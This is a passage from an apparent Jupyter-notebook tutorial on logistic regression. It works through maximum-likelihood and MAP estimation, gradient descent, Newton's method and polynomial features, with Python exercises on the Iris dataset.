The next code fragment represents the output of the same classifier, representing the output of the logistic function in the $x_0$-$x_1$ plane, encoding the value of the logistic function in the representation color.
```
CS = plt.contourf(xx0, xx1, Z)
CS2 = plt.contour(CS, levels=[0.5],
colors='m', linewidths=(3,))
plt.xlabel('$x_0$')
plt.ylabel('$x_1$')
plt.colorbar(CS, ticks=[0, 0.5, 1])
plt.show()
```
### 3.3. Nonlinear classifiers.
The logistic model can be extended to construct non-linear classifiers by using non-linear data transformations. A general form for a nonlinear logistic regression model is
$$P_{Y|{\bf X}}(1|{\bf x}, {\bf w}) = g[{\bf w}^\intercal{\bf z}({\bf x})] $$
where ${\bf z}({\bf x})$ is an arbitrary nonlinear transformation of the original variables. The boundary decision in that case is given by equation
$$
{\bf w}^\intercal{\bf z} = 0
$$
**Exercise 3**: Modify the code above to generate a 3D surface plot of the polynomial logistic regression model given by
$$
P_{Y|{\bf X}}(1|{\bf x}, {\bf w}) = g(1 + 10 x_0 + 10 x_1 - 20 x_0^2 + 5 x_0 x_1 + x_1^2)
$$
```
# Weight vector:
w = [1, 10, 10, -20, 5, 1] # Try different weights
# Create a regtangular grid.
x_min = -1
x_max = 1
dx = x_max - x_min
h = float(dx) / 200
xgrid = np.arange(x_min, x_max, h)
xx0, xx1 = np.meshgrid(xgrid, xgrid)
# Compute the logistic map for the given weights
# Z = <FILL IN>
# Plot the logistic map
fig = plt.figure()
ax = fig.gca(projection='3d')
ax.plot_surface(xx0, xx1, Z, cmap=plt.cm.copper)
plt.xlabel('$x_0$')
plt.ylabel('$x_1$')
ax.set_zlabel('P(1|x,w)')
plt.show()
CS = plt.contourf(xx0, xx1, Z)
CS2 = plt.contour(CS, levels=[0.5],
colors='m', linewidths=(3,))
plt.xlabel('$x_0$')
plt.ylabel('$x_1$')
plt.colorbar(CS, ticks=[0, 0.5, 1])
plt.show()
```
## 3. Inference
Remember that the idea of parametric classification is to use the training data set $\mathcal D = \{({\bf x}^{(k)}, y^{(k)}) \in {\mathbb{R}}^N \times \{0,1\}, k=0,\ldots,{K-1}\}$ to set the parameter vector ${\bf w}$ according to certain criterion. Then, the estimate $\hat{\bf w}$ can be used to compute the label prediction for any new observation as
$$\hat{y} = \arg\max_y P_{Y|{\bf X}}(y|{\bf x},\hat{\bf w}).$$
<img src="figs/parametric_decision.png" width=400>
We need still to choose a criterion to optimize with the selection of the parameter vector. In the notebook, we will discuss two different approaches to the estimation of ${\bf w}$:
* Maximum Likelihood (ML): $\hat{\bf w}_{\text{ML}} = \arg\max_{\bf w} P_{{\mathcal D}|{\bf W}}({\mathcal D}|{\bf w})$
* Maximum *A Posteriori* (MAP): $\hat{\bf w}_{\text{MAP}} = \arg\max_{\bf w} p_{{\bf W}|{\mathcal D}}({\bf w}|{\mathcal D})$
For the mathematical derivation of the logistic regression algorithm, the following representation of the logistic model will be useful: noting that
$$P_{Y|{\bf X}}(0|{\bf x}, {\bf w}) = 1-g[{\bf w}^\intercal{\bf z}({\bf x})]
= g[-{\bf w}^\intercal{\bf z}({\bf x})]$$
we can write
$$P_{Y|{\bf X}}(y|{\bf x}, {\bf w}) = g[\overline{y}{\bf w}^\intercal{\bf z}({\bf x})]$$
where $\overline{y} = 2y-1$ is a *symmetrized label* ($\overline{y}\in\{-1, 1\}$).
### 3.1. Model assumptions
In the following, we will make the following assumptions:
- **A1**. (Logistic Regression): We assume a logistic model for the *a posteriori* probability of ${Y}$ given ${\bf X}$, i.e.,
$$P_{Y|{\bf X}}(y|{\bf x}, {\bf w}) = g[{\bar y}{\bf w}^\intercal{\bf z}({\bf x})].$$
- **A2**. All samples in ${\mathcal D}$ have been generated from the same distribution, $p_{{\bf X}, Y}({\bf x}, y)$.
- **A3**. Input variables $\bf x$ do not depend on $\bf w$. This implies that
$$p({\bf x}|{\bf w}) = p({\bf x})$$
- **A4**. Targets $y^{(0)}, \cdots, y^{(K-1)}$ are statistically independent given $\bf w$ and the inputs ${\bf x}^{(0)}, \cdots, {\bf x}^{(K-1)}$, that is:
$$P(y^{(0)}, \cdots, y^{(K-1)} | {\bf x}^{(0)}, \cdots, {\bf x}^{(K-1)}, {\bf w}) = \prod_{k=0}^{K-1} P(y^{(k)} | {\bf x}^{(k)}, {\bf w})$$
### 3.2. ML estimation.
The ML estimate is defined as
$$\hat{\bf w}_{\text{ML}} = \arg\max_{\bf w} P_{{\mathcal D}|{\bf W}}({\mathcal D}|{\bf w})$$
Ussing assumptions A2 and A3 above, we have that
\begin{align}
P_{{\mathcal D}|{\bf W}}({\mathcal D}|{\bf w}) & = p(y^{(0)}, \cdots, y^{(K-1)},{\bf x}^{(0)}, \cdots, {\bf x}^{(K-1)}| {\bf w}) \\
& = P(y^{(0)}, \cdots, y^{(K-1)}|{\bf x}^{(0)}, \cdots, {\bf x}^{(K-1)}, {\bf w}) \; p({\bf x}^{(0)}, \cdots, {\bf x}^{(K-1)}| {\bf w}) \\
& = P(y^{(0)}, \cdots, y^{(K-1)}|{\bf x}^{(0)}, \cdots, {\bf x}^{(K-1)}, {\bf w}) \; p({\bf x}^{(0)}, \cdots, {\bf x}^{(K-1)})\end{align}
Finally, using assumption A4, we can formulate the ML estimation of $\bf w$ as the resolution of the following optimization problem
\begin{align}
\hat {\bf w}_\text{ML} & = \arg \max_{\bf w} P(y^{(0)}, \cdots, y^{(K-1)}|{\bf x}^{(0)}, \cdots, {\bf x}^{(K-1)}, {\bf w}) \\
& = \arg \max_{\bf w} \prod_{k=0}^{K-1} P(y^{(k)}|{\bf x}^{(k)}, {\bf w}) \\
& = \arg \max_{\bf w} \sum_{k=0}^{K-1} \log P(y^{(k)}|{\bf x}^{(k)}, {\bf w}) \\
& = \arg \min_{\bf w} \sum_{k=0}^{K-1} - \log P(y^{(k)}|{\bf x}^{(k)}, {\bf w})
\end{align}
where the arguments of the maximization or minimization problems of the last three lines are usually referred to as the **likelihood**, **log-likelihood** $\left[L(\bf w)\right]$, and **negative log-likelihood** $\left[\text{NLL}(\bf w)\right]$, respectively.
Now, using A1 (the logistic model)
\begin{align}
\text{NLL}({\bf w})
&= - \sum_{k=0}^{K-1}\log\left[g\left(\overline{y}^{(k)}{\bf w}^\intercal {\bf z}^{(k)}\right)\right] \\
&= \sum_{k=0}^{K-1}\log\left[1+\exp\left(-\overline{y}^{(k)}{\bf w}^\intercal {\bf z}^{(k)}\right)\right]
\end{align}
where ${\bf z}^{(k)}={\bf z}({\bf x}^{(k)})$.
It can be shown that $\text{NLL}({\bf w})$ is a convex and differentiable function of ${\bf w}$. Therefore, its minimum is a point with zero gradient.
\begin{align}
\nabla_{\bf w} \text{NLL}(\hat{\bf w}_{\text{ML}})
&= - \sum_{k=0}^{K-1}
\frac{\exp\left(-\overline{y}^{(k)}\hat{\bf w}_{\text{ML}}^\intercal {\bf z}^{(k)}\right) \overline{y}^{(k)} {\bf z}^{(k)}}
{1+\exp\left(-\overline{y}^{(k)}\hat{\bf w}_{\text{ML}}^\intercal {\bf z}^{(k)}
\right)} = \\
&= - \sum_{k=0}^{K-1} \left[y^{(k)}-g(\hat{\bf w}_{\text{ML}}^T {\bf z}^{(k)})\right] {\bf z}^{(k)} = 0
\end{align}
Unfortunately, $\hat{\bf w}_{\text{ML}}$ cannot be taken out from the above equation, and some iterative optimization algorithm must be used to search for the minimum.
### 3.2. Gradient descent.
A simple iterative optimization algorithm is <a href = https://en.wikipedia.org/wiki/Gradient_descent> gradient descent</a>.
\begin{align}
{\bf w}_{n+1} = {\bf w}_n - \rho_n \nabla_{\bf w} \text{NLL}({\bf w}_n)
\end{align}
where $\rho_n >0$ is the *learning step*.
Applying the gradient descent rule to logistic regression, we get the following algorithm:
\begin{align}
{\bf w}_{n+1} &= {\bf w}_n
+ \rho_n \sum_{k=0}^{K-1} \left[y^{(k)}-g({\bf w}_n^\intercal {\bf z}^{(k)})\right] {\bf z}^{(k)}
\end{align}
Defining vectors
\begin{align}
{\bf y} &= [y^{(0)},\ldots,y^{(K-1)}]^\top \\
\hat{\bf p}_n &= [g({\bf w}_n^\top {\bf z}^{(0)}), \ldots, g({\bf w}_n^\top {\bf z}^{(K-1)})]^\top
\end{align}
and matrix
\begin{align}
{\bf Z} = \left[{\bf z}^{(0)},\ldots,{\bf z}^{(K-1)}\right]^\top
\end{align}
we can write
\begin{align}
{\bf w}_{n+1} &= {\bf w}_n
+ \rho_n {\bf Z}^\top \left({\bf y}-\hat{\bf p}_n\right)
\end{align}
In the following, we will explore the behavior of the gradient descend method using the Iris Dataset.
#### 3.2.1 Example: Iris Dataset.
As an illustration, consider the <a href = http://archive.ics.uci.edu/ml/datasets/Iris> Iris dataset </a>, taken from the <a href=http://archive.ics.uci.edu/ml/> UCI Machine Learning repository</a>. This data set contains 3 classes of 50 instances each, where each class refers to a type of iris plant (*setosa*, *versicolor* or *virginica*). Each instance contains 4 measurements of given flowers: sepal length, sepal width, petal length and petal width, all in centimeters.
We will try to fit the logistic regression model to discriminate between two classes using only two attributes.
First, we load the dataset and split them in training and test subsets.
```
# Adapted from a notebook by Jason Brownlee
def loadDataset(filename, split):
xTrain = []
cTrain = []
xTest = []
cTest = []
with open(filename, 'r') as csvfile:
lines = csv.reader(csvfile)
dataset = list(lines)
for i in range(len(dataset)-1):
for y in range(4):
dataset[i][y] = float(dataset[i][y])
item = dataset[i]
if random.random() < split:
xTrain.append(item[0:4])
cTrain.append(item[4])
else:
xTest.append(item[0:4])
cTest.append(item[4])
return xTrain, cTrain, xTest, cTest
xTrain_all, cTrain_all, xTest_all, cTest_all = loadDataset('iris.data', 0.66)
nTrain_all = len(xTrain_all)
nTest_all = len(xTest_all)
print('Train:', nTrain_all)
print('Test:', nTest_all)
```
Now, we select two classes and two attributes.
```
# Select attributes
i = 0 # Try 0,1,2,3
j = 1 # Try 0,1,2,3 with j!=i
# Select two classes
c0 = 'Iris-versicolor'
c1 = 'Iris-virginica'
# Select two coordinates
ind = [i, j]
# Take training test
X_tr = np.array([[xTrain_all[n][i] for i in ind] for n in range(nTrain_all)
if cTrain_all[n]==c0 or cTrain_all[n]==c1])
C_tr = [cTrain_all[n] for n in range(nTrain_all)
if cTrain_all[n]==c0 or cTrain_all[n]==c1]
Y_tr = np.array([int(c==c1) for c in C_tr])
n_tr = len(X_tr)
# Take test set
X_tst = np.array([[xTest_all[n][i] for i in ind] for n in range(nTest_all)
if cTest_all[n]==c0 or cTest_all[n]==c1])
C_tst = [cTest_all[n] for n in range(nTest_all)
if cTest_all[n]==c0 or cTest_all[n]==c1]
Y_tst = np.array([int(c==c1) for c in C_tst])
n_tst = len(X_tst)
```
#### 3.2.2. Data normalization
Normalization of data is a common pre-processing step in many machine learning algorithms. Its goal is to get a dataset where all input coordinates have a similar scale. Learning algorithms usually show less instabilities and convergence problems when data are normalized.
We will define a normalization function that returns a training data matrix with zero sample mean and unit sample variance.
```
def normalize(X, mx=None, sx=None):
# Compute means and standard deviations
if mx is None:
mx = np.mean(X, axis=0)
if sx is None:
sx = np.std(X, axis=0)
# Normalize
X0 = (X-mx)/sx
return X0, mx, sx
```
Now, we can normalize training and test data. Observe in the code that the same transformation should be applied to training and test data. This is the reason why normalization with the test data is done using the means and the variances computed with the training set.
```
# Normalize data
Xn_tr, mx, sx = normalize(X_tr)
Xn_tst, mx, sx = normalize(X_tst, mx, sx)
```
The following figure generates a plot of the normalized training data.
```
# Separate components of x into different arrays (just for the plots)
x0c0 = [Xn_tr[n][0] for n in range(n_tr) if Y_tr[n]==0]
x1c0 = [Xn_tr[n][1] for n in range(n_tr) if Y_tr[n]==0]
x0c1 = [Xn_tr[n][0] for n in range(n_tr) if Y_tr[n]==1]
x1c1 = [Xn_tr[n][1] for n in range(n_tr) if Y_tr[n]==1]
# Scatterplot.
labels = {'Iris-setosa': 'Setosa',
'Iris-versicolor': 'Versicolor',
'Iris-virginica': 'Virginica'}
plt.plot(x0c0, x1c0,'r.', label=labels[c0])
plt.plot(x0c1, x1c1,'g+', label=labels[c1])
plt.xlabel('$x_' + str(ind[0]) + '$')
plt.ylabel('$x_' + str(ind[1]) + '$')
plt.legend(loc='best')
plt.axis('equal')
plt.show()
```
In order to apply the gradient descent rule, we need to define two methods:
- A `fit` method, that receives the training data and returns the model weights and the value of the negative log-likelihood during all iterations.
- A `predict` method, that receives the model weight and a set of inputs, and returns the posterior class probabilities for that input, as well as their corresponding class predictions.
```
def logregFit(Z_tr, Y_tr, rho, n_it):
# Data dimension
n_dim = Z_tr.shape[1]
# Initialize variables
nll_tr = np.zeros(n_it)
pe_tr = np.zeros(n_it)
Y_tr2 = 2*Y_tr - 1 # Transform labels into binary symmetric.
w = np.random.randn(n_dim,1)
# Running the gradient descent algorithm
for n in range(n_it):
# Compute posterior probabilities for weight w
p1_tr = logistic(np.dot(Z_tr, w))
# Compute negative log-likelihood
# (note that this is not required for the weight update, only for nll tracking)
nll_tr[n] = np.sum(np.log(1 + np.exp(-np.dot(Y_tr2*Z_tr, w))))
# Update weights
w += rho*np.dot(Z_tr.T, Y_tr - p1_tr)
return w, nll_tr
def logregPredict(Z, w):
# Compute posterior probability of class 1 for weights w.
p = logistic(np.dot(Z, w)).flatten()
# Class
D = [int(round(pn)) for pn in p]
return p, D
```
We can test the behavior of the gradient descent method by fitting a logistic regression model with ${\bf z}({\bf x}) = (1, {\bf x}^\top)^\top$.
```
# Parameters of the algorithms
rho = float(1)/50 # Learning step
n_it = 200 # Number of iterations
# Compute Z's
Z_tr = np.c_[np.ones(n_tr), Xn_tr]
Z_tst = np.c_[np.ones(n_tst), Xn_tst]
n_dim = Z_tr.shape[1]
# Convert target arrays to column vectors
Y_tr2 = Y_tr[np.newaxis].T
Y_tst2 = Y_tst[np.newaxis].T
# Running the gradient descent algorithm
w, nll_tr = logregFit(Z_tr, Y_tr2, rho, n_it)
# Classify training and test data
p_tr, D_tr = logregPredict(Z_tr, w)
p_tst, D_tst = logregPredict(Z_tst, w)
# Compute error rates
E_tr = D_tr!=Y_tr
E_tst = D_tst!=Y_tst
# Error rates
pe_tr = float(sum(E_tr)) / n_tr
pe_tst = float(sum(E_tst)) / n_tst
# NLL plot.
plt.plot(range(n_it), nll_tr,'b.:', label='Train')
plt.xlabel('Iteration')
plt.ylabel('Negative Log-Likelihood')
plt.legend()
print('The optimal weights are:')
print(w)
print('The final error rates are:')
print('- Training:', pe_tr)
print('- Test:', pe_tst)
print('The NLL after training is', nll_tr[len(nll_tr)-1])
```
#### 3.2.3. Free parameters
Under certain conditions, the gradient descent method can be shown to converge asymptotically (i.e. as the number of iterations goes to infinity) to the ML estimate of the logistic model. However, in practice, the final estimate of the weights ${\bf w}$ depend on several factors:
- Number of iterations
- Initialization
- Learning step
**Exercise 4**: Visualize the variability of gradient descent caused by initializations. To do so, fix the number of iterations to 200 and the learning step, and execute the gradient descent 100 times, storing the training error rate of each execution. Plot the histogram of the error rate values.
Note that you can do this exercise with a loop over the 100 executions, including the code in the previous code slide inside the loop, with some proper modifications. To plot a histogram of the values in array `p` with `n`bins, you can use `plt.hist(p, n)`
##### 3.2.3.1. Learning step
The learning step, $\rho$, is a free parameter of the algorithm. Its choice is critical for the convergence of the algorithm. Too large values of $\rho$ make the algorithm diverge. For too small values, the convergence gets very slow and more iterations are required for a good convergence.
**Exercise 5**: Observe the evolution of the negative log-likelihood with the number of iterations for different values of $\rho$. It is easy to check that, for large enough $\rho$, the gradient descent method does not converge. Can you estimate (through manual observation) an approximate value of $\rho$ stating a boundary between convergence and divergence?
**Exercise 6**: In this exercise we explore the influence of the learning step more sistematically. Use the code in the previouse exercises to compute, for every value of $\rho$, the average error rate over 100 executions. Plot the average error rate vs. $\rho$.
Note that you should explore the values of $\rho$ in a logarithmic scale. For instance, you can take $\rho = 1, \frac{1}{10}, \frac{1}{100}, \frac{1}{1000}, \ldots$
In practice, the selection of $\rho$ may be a matter of trial an error. Also there is some theoretical evidence that the learning step should decrease along time up to cero, and the sequence $\rho_n$ should satisfy two conditions:
- C1: $\sum_{n=0}^{\infty} \rho_n^2 < \infty$ (decrease slowly)
- C2: $\sum_{n=0}^{\infty} \rho_n = \infty$ (but not too slowly)
For instance, we can take $\rho_n= \frac{1}{n}$. Another common choice is $\rho_n = \frac{\alpha}{1+\beta n}$ where $\alpha$ and $\beta$ are also free parameters that can be selected by trial and error with some heuristic method.
#### 3.2.4. Visualizing the posterior map.
We can also visualize the posterior probability map estimated by the logistic regression model for the estimated weights.
```
# Create a regtangular grid.
x_min, x_max = Xn_tr[:, 0].min(), Xn_tr[:, 0].max()
y_min, y_max = Xn_tr[:, 1].min(), Xn_tr[:, 1].max()
dx = x_max - x_min
dy = y_max - y_min
h = dy /400
xx, yy = np.meshgrid(np.arange(x_min - 0.1 * dx, x_max + 0.1 * dx, h),
np.arange(y_min - 0.1 * dx, y_max + 0.1 * dy, h))
X_grid = np.array([xx.ravel(), yy.ravel()]).T
# Compute Z's
Z_grid = np.c_[np.ones(X_grid.shape[0]), X_grid]
# Compute the classifier output for all samples in the grid.
pp, dd = logregPredict(Z_grid, w)
# Paint output maps
pylab.rcParams['figure.figsize'] = 6, 6 # Set figure size
# Put the result into a color plot
plt.plot(x0c0, x1c0,'r.', label=labels[c0])
plt.plot(x0c1, x1c1,'g+', label=labels[c1])
plt.xlabel('$x_' + str(ind[0]) + '$')
plt.ylabel('$x_' + str(ind[1]) + '$')
plt.legend(loc='best')
plt.axis('equal')
pp = pp.reshape(xx.shape)
CS = plt.contourf(xx, yy, pp, cmap=plt.cm.copper)
plt.contour(xx, yy, pp, levels=[0.5],
colors='b', linewidths=(3,))
plt.colorbar(CS, ticks=[0, 0.5, 1])
plt.show()
```
#### 3.2.5. Polynomial Logistic Regression
The error rates of the logistic regression model can be potentially reduced by using polynomial transformations.
To compute the polynomial transformation up to a given degree, we can use the `PolynomialFeatures` method in `sklearn.preprocessing`.
```
# Parameters of the algorithms
rho = float(1)/50 # Learning step
n_it = 500 # Number of iterations
g = 5 # Degree of polynomial
# Compute Z_tr
poly = PolynomialFeatures(degree=g)
Z_tr = poly.fit_transform(Xn_tr)
# Normalize columns (this is useful to make algorithms more stable).)
Zn, mz, sz = normalize(Z_tr[:,1:])
Z_tr = np.concatenate((np.ones((n_tr,1)), Zn), axis=1)
# Compute Z_tst
Z_tst = poly.fit_transform(Xn_tst)
Zn, mz, sz = normalize(Z_tst[:,1:], mz, sz)
Z_tst = np.concatenate((np.ones((n_tst,1)), Zn), axis=1)
# Convert target arrays to column vectors
Y_tr2 = Y_tr[np.newaxis].T
Y_tst2 = Y_tst[np.newaxis].T
# Running the gradient descent algorithm
w, nll_tr = logregFit(Z_tr, Y_tr2, rho, n_it)
# Classify training and test data
p_tr, D_tr = logregPredict(Z_tr, w)
p_tst, D_tst = logregPredict(Z_tst, w)
# Compute error rates
E_tr = D_tr!=Y_tr
E_tst = D_tst!=Y_tst
# Error rates
pe_tr = float(sum(E_tr)) / n_tr
pe_tst = float(sum(E_tst)) / n_tst
# NLL plot.
plt.plot(range(n_it), nll_tr,'b.:', label='Train')
plt.xlabel('Iteration')
plt.ylabel('Negative Log-Likelihood')
plt.legend()
print('The optimal weights are:')
print(w)
print('The final error rates are:')
print('- Training:', pe_tr)
print('- Test:', pe_tst)
print('The NLL after training is', nll_tr[len(nll_tr)-1])
```
Visualizing the posterior map we can se that the polynomial transformation produces nonlinear decision boundaries.
```
# Compute Z_grid
Z_grid = poly.fit_transform(X_grid)
n_grid = Z_grid.shape[0]
Zn, mz, sz = normalize(Z_grid[:,1:], mz, sz)
Z_grid = np.concatenate((np.ones((n_grid,1)), Zn), axis=1)
# Compute the classifier output for all samples in the grid.
pp, dd = logregPredict(Z_grid, w)
pp = pp.reshape(xx.shape)
# Paint output maps
pylab.rcParams['figure.figsize'] = 6, 6 # Set figure size
plt.plot(x0c0, x1c0,'r.', label=labels[c0])
plt.plot(x0c1, x1c1,'g+', label=labels[c1])
plt.xlabel('$x_' + str(ind[0]) + '$')
plt.ylabel('$x_' + str(ind[1]) + '$')
plt.axis('equal')
plt.legend(loc='best')
CS = plt.contourf(xx, yy, pp, cmap=plt.cm.copper)
plt.contour(xx, yy, pp, levels=[0.5],
colors='b', linewidths=(3,))
plt.colorbar(CS, ticks=[0, 0.5, 1])
plt.show()
```
## 4. Regularization and MAP estimation.
An alternative to the ML estimation of the weights in logistic regression is Maximum A Posteriori estimation. Modelling the logistic regression weights as a random variable with prior distribution $p_{\bf W}({\bf w})$, the MAP estimate is defined as
$$
\hat{\bf w}_{\text{MAP}} = \arg\max_{\bf w} p({\bf w}|{\mathcal D})
$$
The posterior density $p({\bf w}|{\mathcal D})$ is related to the likelihood function and the prior density of the weights, $p_{\bf W}({\bf w})$ through the Bayes rule
$$
p({\bf w}|{\mathcal D}) =
\frac{P\left({\mathcal D}|{\bf w}\right) \; p_{\bf W}({\bf w})}
{p\left({\mathcal D}\right)}
$$
In general, the denominator in this expression cannot be computed analytically. However, it is not required for MAP estimation because it does not depend on ${\bf w}$. Therefore, the MAP solution is given by
\begin{align}
\hat{\bf w}_{\text{MAP}} & = \arg\max_{\bf w} \left\{ P\left({\mathcal D}|{\bf w}\right) \; p_{\bf W}({\bf w}) \right\}\\
& = \arg\max_{\bf w} \left\{ L({\mathbf w}) + \log p_{\bf W}({\bf w})\right\} \\
& = \arg\min_{\bf w} \left\{ \text{NLL}({\mathbf w}) - \log p_{\bf W}({\bf w})\right\}
\end{align}
In the light of this expression, we can conclude that the MAP solution is affected by two terms:
- The likelihood, which takes large values for parameter vectors $\bf w$ that fit well the training data (smaller $\text{NLL}$ values)
- The prior distribution of weights $p_{\bf W}({\bf w})$, which expresses our *a priori* preference for some solutions. **Usually, we recur to prior distributions that take large values when $\|{\bf w}\|$ is small (associated to smooth classification borders).**
We can check that the MAP criterion adds a penalty term to the ML objective, that penalizes parameter vectors for which the prior distribution of weights takes small values.
### 4.1 MAP estimation with Gaussian prior
If we assume that ${\bf W}$ follows a zero-mean Gaussian random variable with variance matrix $v{\bf I}$,
$$
p_{\bf W}({\bf w}) = \frac{1}{(2\pi v)^{N/2}} \exp\left(-\frac{1}{2v}\|{\bf w}\|^2\right)
$$
the MAP estimate becomes
\begin{align}
\hat{\bf w}_{\text{MAP}}
&= \arg\min_{\bf w} \left\{\text{NLL}({\bf w}) + \frac{1}{C}\|{\bf w}\|^2
\right\}
\end{align}
where $C = 2v$. Noting that
$$\nabla_{\bf w}\left\{\text{NLL}({\bf w}) + \frac{1}{C}\|{\bf w}\|^2\right\}
= - {\bf Z} \left({\bf y}-\hat{\bf p}_n\right) + \frac{2}{C}{\bf w},
$$
we obtain the following gradient descent rule for MAP estimation
\begin{align}
{\bf w}_{n+1} &= \left(1-\frac{2\rho_n}{C}\right){\bf w}_n
+ \rho_n {\bf Z} \left({\bf y}-\hat{\bf p}_n\right)
\end{align}
### 4.2 MAP estimation with Laplacian prior
If we assume that ${\bf W}$ follows a multivariate zero-mean Laplacian distribution given by
$$
p_{\bf W}({\bf w}) = \frac{1}{(2 C)^{N}} \exp\left(-\frac{1}{C}\|{\bf w}\|_1\right)
$$
(where $\|{\bf w}\|=|w_1|+\ldots+|w_N|$ is the $L_1$ norm of ${\bf w}$), the MAP estimate becomes
\begin{align}
\hat{\bf w}_{\text{MAP}}
&= \arg\min_{\bf w} \left\{\text{NLL}({\bf w}) + \frac{1}{C}\|{\bf w}\|_1
\right\}
\end{align}
The additional term introduced by the prior in the optimization algorithm is usually named the *regularization term*. It is usually very effective to avoid overfitting when the dimension of the weight vectors is high. Parameter $C$ is named the *inverse regularization strength*.
**Exercise 7**: Derive the gradient descent rules for MAP estimation of the logistic regression weights with Laplacian prior.
## 5. Other optimization algorithms
### 5.1. Stochastic Gradient descent.
Stochastic gradient descent (SGD) is based on the idea of using a single sample at each iteration of the learning algorithm. The SGD rule for ML logistic regression is
\begin{align}
{\bf w}_{n+1} &= {\bf w}_n
+ \rho_n {\bf z}^{(n)} \left(y^{(n)}-\hat{p}^{(n)}_n\right)
\end{align}
Once all samples in the training set have been applied, the algorith can continue by applying the training set several times.
The computational cost of each iteration of SGD is much smaller than that of gradient descent, though it usually needs many more iterations to converge.
**Exercise 8**: Modify logregFit to implement an algorithm that applies the SGD rule.
### 5.2. Newton's method
Assume that the function to be minimized, $C({\bf w})$, can be approximated by its second order Taylor series expansion around ${\bf w}_0$
$$
C({\bf w}) \approx C({\bf w}_0)
+ \nabla_{\bf w}^\top C({\bf w}_0)({\bf w}-{\bf w}_0)
+ \frac{1}{2}({\bf w}-{\bf w}_0)^\top{\bf H}({\bf w}_0)({\bf w}-{\bf w}_0)
$$
where ${\bf H}({\bf w}_k)$ is the <a href=https://en.wikipedia.org/wiki/Hessian_matrix> *Hessian* matrix</a> of $C$ at ${\bf w}_k$. Taking the gradient of $C({\bf w})$, and setting the result to ${\bf 0}$, the minimum of C around ${\bf w}_0$ can be approximated as
$$
{\bf w}^* = {\bf w}_0 - {\bf H}({\bf w}_0)^{-1} \nabla_{\bf w}^\top C({\bf w}_0)
$$
Since the second order polynomial is only an approximation to $C$, ${\bf w}^*$ is only an approximation to the optimal weight vector, but we can expect ${\bf w}^*$ to be closer to the minimizer of $C$ than ${\bf w}_0$. Thus, we can repeat the process, computing a second order approximation around ${\bf w}^*$ and a new approximation to the minimizer.
<a href=https://en.wikipedia.org/wiki/Newton%27s_method_in_optimization> Newton's method</a> is based on this idea. At each optization step, the function to be minimized is approximated by a second order approximation using a Taylor series expansion around the current estimate. As a result, the learning rule becomes
$$\hat{\bf w}_{n+1} = \hat{\bf w}_{n} - \rho_n {\bf H}({\bf w}_k)^{-1} \nabla_{{\bf w}}C({\bf w}_k)
$$
For instance, for the MAP estimate with Gaussian prior, the *Hessian* matrix becomes
$$
{\bf H}({\bf w})
= \frac{2}{C}{\bf I} + \sum_{k=0}^{K-1} g({\bf w}^\top {\bf z}^{(k)}) \left[1-g({\bf w}^\top {\bf z}^{(k)})\right]{\bf z}^{(k)} ({\bf z}^{(k)})^\top
$$
Defining diagonal matrix
$$
{\mathbf S}({\bf w}) = \text{diag}\left[g({\bf w}^\top {\bf z}^{(k)}) \left(1-g({\bf w}^\top {\bf z}^{(k)})\right)\right]
$$
the Hessian matrix can be written in more compact form as
$$
{\bf H}({\bf w})
= \frac{2}{C}{\bf I} + {\bf Z}^\top {\bf S}({\bf w}) {\bf Z}
$$
Therefore, the Newton's algorithm for logistic regression becomes
\begin{align}
{\bf w}_{n+1} = {\bf w}_{n} +
\rho_n
\left(\frac{2}{C}{\bf I} + {\bf Z}^\top {\bf S}({\bf w}_{n})
{\bf Z}
\right)^{-1}
{\bf Z}^\top \left({\bf y}-\hat{\bf p}_n\right)
\end{align}
Some variants of the Newton method are implemented in the <a href="http://scikit-learn.org/stable/"> Scikit-learn </a> package.
```
def logregFit2(Z_tr, Y_tr, rho, n_it, C=1e4):
# Compute Z's
r = 2.0/C
n_dim = Z_tr.shape[1]
# Initialize variables
nll_tr = np.zeros(n_it)
pe_tr = np.zeros(n_it)
w = np.random.randn(n_dim,1)
# Running the gradient descent algorithm
for n in range(n_it):
p_tr = logistic(np.dot(Z_tr, w))
sk = np.multiply(p_tr, 1-p_tr)
S = np.diag(np.ravel(sk.T))
# Compute negative log-likelihood
nll_tr[n] = - np.dot(Y_tr.T, np.log(p_tr)) - np.dot((1-Y_tr).T, np.log(1-p_tr))
# Update weights
invH = np.linalg.inv(r*np.identity(n_dim) + np.dot(Z_tr.T, np.dot(S, Z_tr)))
w += rho*np.dot(invH, np.dot(Z_tr.T, Y_tr - p_tr))
return w, nll_tr
# Parameters of the algorithms
rho = float(1)/50 # Learning step
n_it = 500 # Number of iterations
C = 1000
g = 4
# Compute Z_tr
poly = PolynomialFeatures(degree=g)
Z_tr = poly.fit_transform(X_tr)
# Normalize columns (this is useful to make algorithms more stable).)
Zn, mz, sz = normalize(Z_tr[:,1:])
Z_tr = np.concatenate((np.ones((n_tr,1)), Zn), axis=1)
# Compute Z_tst
Z_tst = poly.fit_transform(X_tst)
Zn, mz, sz = normalize(Z_tst[:,1:], mz, sz)
Z_tst = np.concatenate((np.ones((n_tst,1)), Zn), axis=1)
# Convert target arrays to column vectors
Y_tr2 = Y_tr[np.newaxis].T
Y_tst2 = Y_tst[np.newaxis].T
# Running the gradient descent algorithm
w, nll_tr = logregFit2(Z_tr, Y_tr2, rho, n_it, C)
# Classify training and test data
p_tr, D_tr = logregPredict(Z_tr, w)
p_tst, D_tst = logregPredict(Z_tst, w)
# Compute error rates
E_tr = D_tr!=Y_tr
E_tst = D_tst!=Y_tst
# Error rates
pe_tr = float(sum(E_tr)) / n_tr
pe_tst = float(sum(E_tst)) / n_tst
# NLL plot.
plt.plot(range(n_it), nll_tr,'b.:', label='Train')
plt.xlabel('Iteration')
plt.ylabel('Negative Log-Likelihood')
plt.legend()
print('The final error rates are:')
print('- Training:', str(pe_tr))
print('- Test:', str(pe_tst))
print('The NLL after training is:', str(nll_tr[len(nll_tr)-1]))
```
## 6. Logistic regression in Scikit Learn.
The <a href="http://scikit-learn.org/stable/"> scikit-learn </a> package includes an efficient implementation of <a href="http://scikit-learn.org/stable/modules/generated/sklearn.linear_model.LogisticRegression.html#sklearn.linear_model.LogisticRegression"> logistic regression</a>. To use it, we must first create a classifier object, specifying the parameters of the logistic regression algorithm.
```
# Create a logistic regression object.
LogReg = linear_model.LogisticRegression(C=1.0)
# Compute Z_tr
poly = PolynomialFeatures(degree=g)
Z_tr = poly.fit_transform(Xn_tr)
# Normalize columns (this is useful to make algorithms more stable).)
Zn, mz, sz = normalize(Z_tr[:,1:])
Z_tr = np.concatenate((np.ones((n_tr,1)), Zn), axis=1)
# Compute Z_tst
Z_tst = poly.fit_transform(Xn_tst)
